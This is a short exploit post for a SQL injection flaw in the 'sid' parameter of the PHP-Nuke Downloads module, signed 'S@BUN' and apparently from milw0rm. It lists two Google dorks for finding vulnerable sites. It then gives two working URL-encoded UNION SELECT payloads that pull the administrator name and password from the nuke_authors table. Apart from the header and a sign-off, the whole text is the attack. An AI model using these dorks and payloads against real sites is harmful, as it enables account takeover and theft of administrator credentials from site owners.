PHP-Nuke Module Downloads SQL Injection(sid)

[hackturkiye.hackturkiye@xxxxxxxxx]

###############################################################
# 
#   PHP-Nuke Module Downloads SQL Injection(sid)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye@xxxxxxxxx
#        
################################################################
# 
#  DORK 1 : allinurl: sid "modules php name Downloads"
# 
#  DORK 2 : allinurl: sid"d_op=viewsdownload"
#
################################################################
   EXPLOIT : 

admin =

modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202

pass=

modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################